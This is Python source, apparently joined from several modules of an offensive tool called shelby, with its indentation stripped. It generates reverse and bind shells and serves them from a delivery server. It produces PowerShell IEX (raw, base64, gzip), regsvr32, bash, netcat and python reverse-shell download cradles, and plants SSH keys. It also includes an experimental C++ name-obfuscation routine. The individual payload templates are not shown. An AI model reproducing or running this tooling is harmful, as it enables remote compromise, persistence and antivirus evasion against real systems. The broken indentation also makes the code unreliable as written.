def stats_banner():
delimeter = ' ' * 10
msg = '|%sStatistics%s|' % (delimeter,delimeter)
corner = logger.red_fg('+')
bar = '-' * (len(msg) - 2)
print(corner+bar+ corner)
print(logger.red_fg(msg))
print(corner+bar+ corner)
def main():
args = arguments.get_args() # get all the arguments
absolute_path = os.path.dirname(os.path.realpath(__file__))
absolute_path = str(absolute_path).replace('/lib', '/')
if args.experimental:
experimental_obfuscation.obfuscate()
quit()
# generate_all_shells() runs through all the various shells that are in shelby and replaces the templates and writes them out to args.cradle_directory; it returns a list of shell objects.
all_shells = shells.generate_all_shells(
) # This purely configures the shells and writes them to ./server_port.
# print some useful stuff
print("The Web Delivery Server is at: %s:%s" %
(logger.red_fg(args.ip_address), logger.red_fg(args.server_port)))
print("Shells receiving at: %s:%s" %
(logger.red_fg(args.ip_address), logger.red_fg(args.shell_port)))
print("Writing cradles to: %s" % logger.red_fg(args.cradle_directory))
print()
# print out the available shells
if all_shells != None:
logger.heading('Shells')
for shell in all_shells:
logger.bullet('%s: %s' %
(logger.yellow_fg(shell.name), shell.location))
logger.heading('SSH Keys')
logger.bullet(
'%s: %s' %
(logger.yellow_fg('SSH Keys written to'), args.ssh_directory))
# same thing as generate_all_shells()
all_cradles = cradles.generate_all_cradles(all_shells)
with open('cradle_commands.txt', 'a') as f:
time_of_run = strftime("%d/%m/%y, %H:%M:%S", gmtime())
f.write('%s\n%s\n' % (time_of_run, '=' * len(time_of_run)))
logger.heading('Cradles')
for counter, cradle in enumerate(all_cradles):
print('%s %s' % (logger.yellow_fg('[-]'), cradle.name))
logger.green.fg(cradle.execution)
f.write('[%s] %s:\n%s\n\n' %
(counter, cradle.name, cradle.execution))
print()
print(
'[%s]\tWritten by %s & %s (%s)' %
(logger.yellow_fg('+'), logger.yellow_fg('@michaelranaldo'),
logger.yellow_fg('@mez-0'), logger.yellow_fg('https://ad-995.group')))
def obfuscate():
args = arguments.get_args()
logger.heading('C++ Obfuscation')
print(
'%s: This is an experimental function and it only works on C++ projects.'
% logger.yellow_fg('WARNING'))
working_directory = args.experimental_args
if working_directory == None:
logger.red.fg('Please specify a a directory containing a cpp project!')
quit()
new_directory = './experimental_obfuscation/'
print('Writing to: %s' % logger.red_fg(new_directory))
original_root_dir = working_directory[:working_directory.rindex('/')] + '/'
copy(working_directory, new_directory)
all_files = get_all_files(working_directory)
if all_files == None:
print('No files found in %s!' % logger.red_fg(working_directory))
return False
cpp_files = get_cpp_files(all_files)
if cpp_files == None:
print('No cpp files found in %s!' % logger.red_fg(working_directory))
return False
header_files = get_header_files(all_files)
if header_files == None:
print('No header files found in %s!' %
logger.red_fg(working_directory))
return False
cpp_objs = create_cpp_objs(cpp_files)
if cpp_objs == None:
logger.red.fg('Could not extract cpp functions from cpp files!')
return False
gns_objs = create_globalnamespace(cpp_files)
if gns_objs == None:
logger.red.fg('Could not extract global namespaces from cpp files!')
return False
do_name_change(cpp_files, cpp_objs, gns_objs, new_directory,
original_root_dir)
fix_header_files(header_files, gns_objs, new_directory, original_root_dir)
def generate_all_cradles(all_shells):
# each of these are lists of cradles; cradle for each shell. one for bind, one for reverse etc etc.
if args.linux == False and args.windows == False:
powershell_IEX_raw_cradles = powershell_IEX_raw(all_shells)
powershell_IEX_b64_cradles = powershell_IEX_b64(all_shells)
powershell_IEX_gzip_cradles = powershell_IEX_gzip(all_shells)
regsvr32_cradles = regsvr32(all_shells)
linux_cradles = [
bash_reverse(),
netcat_reverse(),
netcat_reverse_openbsd(),
python_reverse(),
add_ssh_key_sh(all_shells)
]
cradles = powershell_IEX_raw_cradles + powershell_IEX_b64_cradles + powershell_IEX_gzip_cradles + regsvr32_cradles + linux_cradles
elif args.windows:
powershell_IEX_raw_cradles = powershell_IEX_raw(all_shells)
powershell_IEX_b64_cradles = powershell_IEX_b64(all_shells)
powershell_IEX_gzip_cradles = powershell_IEX_gzip(all_shells)
regsvr32_cradles = regsvr32(all_shells)
cradles = powershell_IEX_raw_cradles + powershell_IEX_b64_cradles + powershell_IEX_gzip_cradles + regsvr32_cradles
elif args.linux:
linux_cradles = [
bash_reverse(),
netcat_reverse(),
netcat_reverse_openbsd(),
python_reverse(),
add_ssh_key_sh(all_shells)
]
cradles = linux_cradles
else:
logger.red.fg("Unknown OS type. Please specify %s or %s!" %
(logger.red_fg('Linux'), logger.red_fg('Windows')))
quit()
return cradles
def copy(src, dest):
try:
print('Copied %s to %s' %
(logger.green_fg(src), logger.green_fg(dest)))
shutil.copytree(src, dest)
return True
except OSError as e:
if e.errno == errno.ENOTDIR:
print('Copied %s to %s' %
(logger.green_fg(src), logger.green_fg(dest)))
shutil.copy(src, dest)
return True
else:
print('%s already exists' % logger.red_fg(dest))
return False
def write_shell_out(filename,content):
if args.randomize_names:
filename = ''.join(random.choice(string.ascii_lowercase) for i in range(12))
else:
filename = filename
if not os.path.exists(args.cradle_directory):
try:
os.mkdir(args.cradle_directory)
except Exception as e:
print('Got error: %s' % logger.red_fg(e))
quit()
location = args.cradle_directory + filename
with open(location, "w") as destination_file:
destination_file.write(content)
return filename,location # write the shell and return the name and location of it